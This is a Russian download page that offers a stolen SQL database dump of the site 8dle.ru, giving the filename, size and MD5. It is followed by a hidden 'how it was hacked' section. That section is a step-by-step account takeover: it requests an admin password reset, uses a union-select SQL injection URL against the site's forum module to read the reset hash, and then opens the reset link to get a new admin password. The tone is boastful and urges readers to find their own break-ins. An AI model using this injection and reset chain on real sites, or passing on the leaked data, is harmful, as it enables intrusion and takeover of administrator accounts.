Данный материал предоставлен сайтом ProWebber.cc исключительно в ознакомительных целях. Администрация не несет ответственности за его содержимое.
Скачать бесплатно База 8dle.ru.
Скачать бесплатно База 8dle.ru.
Скачать прямо сейчас:
8dle_2010-05-23_16-42_kkwht.sql.rar [2.12 Mb] (cкачиваний: 295)
MD5: a096ce990077c6d1ff6ec4040bee1484
MD5: a096ce990077c6d1ff6ec4040bee1484
Как взломали:
[hidden=10,10,200]на 8dle.ru был установлен форум с уязвимостью sql inj
сначала идем на страницу 8dle.ru/?do=lostpassword
В поле вписываем имя админа
Далее в поле PREFIX_lostdb хранится хеш, который отсылается на почту, если открыть правильную ссылку с хешем получается такая же уязвимость как и на 8,2 с востановлением cool
И так мы снегерировали хешь, осталось только достать его из базы
http://8dle.ru/?do=forum&showtopic=23'+union+select+1,2,CONCAT_WS(0x3a, lostname,lostid),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+8dle_lostdb+where+lostname =ID+limit+1--
указываете ID юзера которого ломаем
смотрим в исходнике полученной страницы *** >> Darknull:md5
Копируем хешь и идем на ссылку
8dle.ru/?do=lostpassword&douser=ID&lostid=md5
вот и перед вами новый админский пароль smile
Если все сделано верно то вы гений biggrin
P.S. 8dle.ru уже залатали востановление пароля
так что ищите свои методы взлома smile[/hidden]
Предыдущая Следующая